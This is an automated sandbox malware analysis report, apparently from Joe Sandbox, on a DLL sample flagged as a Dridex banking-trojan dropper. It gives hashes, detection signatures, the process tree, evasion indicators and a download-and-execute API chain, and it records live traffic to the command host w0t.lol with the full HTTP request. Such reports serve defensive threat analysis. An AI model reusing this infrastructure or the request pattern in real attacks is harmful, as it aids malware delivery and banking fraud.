Windows Analysis Report
e.dll

Overview

General Information

Sample name: e.dll
Analysis ID: 1523389
MD5: 972d3e17b96745be89b80ec5d8f4f9d3
SHA1: e97c6461bbdcd91566f4cb75b456e399b7fe06c2
SHA256: b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda

Detection

Dridex Dropper
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Dridex dropper found
Found detection on Joe Sandbox Cloud Basic
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • loaddll32.exe (PID: 2788 cmdline: loaddll32.exe "C:\Users\user\Desktop\e.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2460 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 856 cmdline: rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: e.dll | Avira: detected
Source: e.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_27AC1120 GetTickCount,SHGetValueA,SHSetValueA,UuidCreateSequential,sprintf,RtlComputeCrc32,GlobalAlloc,sprintf,RtlComputeCrc32,sprintf,RtlComputeCrc32,sprintf,GetModuleFileNameA,sprintf,GetCommandLineA,sprintf,memset,CryptBinaryToStringA,sprintf,memset,EnumDisplaySettingsA,sprintf,memcpy,memcpy,memset,GlobalFree,CryptAcquireContextA,CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptEncrypt,CryptBinaryToStringA,memset,GlobalFree,URLDownloadToCacheFileA,lstrlen,memset,GlobalFree,_lopen,_hread,_lclose,WinExec,GlobalFree, 3_2_27AC1120
Source: e.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: Binary string: a:\s7i.pdbL | source: e.dll
Source: Binary string: a:\s7i.pdb | source: loaddll32.exe, 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06982A81 FindFirstFileW, 3_3_06982A81

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 104.21.69.9 443
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: w0t.lol
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: w0t.lol
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 01 Oct 2024 13:14:22 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: no-cache, no-store, must-revalidate
    CF-Cache-Status: DYNAMIC
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8cbcb62419383343-MIA
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000003.00000003.84857412676.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973750078.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/
Source: rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5T
Source: rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/T
Source: rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w0t.lol/v
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768

E-Banking Fraud

Source: Initial file | Signature Results: Dridex dropper behavior

System Summary

Source: e.dll | Joe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: Dridex Dropper Analyzer: w10x64native
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 6%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06966790 NtQueryDirectoryObject, 3_3_06966790
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_0696D969 NtQuerySystemInformation, 3_3_0696D969
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_051B2084 NtCreateThreadEx, 3_2_051B2084
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_0695D53D: DeviceIoControl, 3_3_0695D53D
Source: e.dll | Static PE information: Number of sections : 13 > 10
Source: e.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: e.dll | Static PE information: Section: z4g ZLIB complexity 0.9946666190294715
Source: e.dll | Static PE information: Section: qm ZLIB complexity 0.9991314643252213
Source: e.dll | Static PE information: Section: L ZLIB complexity 0.9966262291217672
Source: classification engine | Classification label: mal72.bank.evad.winDLL@6/0@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:304:WilStaging_02
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\e.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: z55x9i2q7.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security
Source: e.dll | Static file information: File size 2228224 > 1048576
Source: e.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e.dll | Static PE information: section name: .crt1
Source: e.dll | Static PE information: section name: z4g
Source: e.dll | Static PE information: section name: qm
Source: e.dll | Static PE information: section name: L
Source: e.dll | Static PE information: section name: CONST
Source: e.dll | Static PE information: section name: 3
Source: e.dll | Static PE information: section name: buicKDZl
Source: e.dll | Static PE information: section name: CRT
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0060996B pushfd ; ret 0_2_0060997B
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00570E37 push eax; retf 0_2_00570E3E
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0060D1F4 push edi; ret 0_2_0060D1F5
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_006099DB pushfd ; iretd 0_2_006099DC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_0533D5C8 push ebp; retf 3_3_0533D5C9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_069825F0 push esi; mov dword ptr [esp], ecx 3_3_069825F4
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe | Section loaded: \KnownDlls32\TeSTAPp.EXE
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
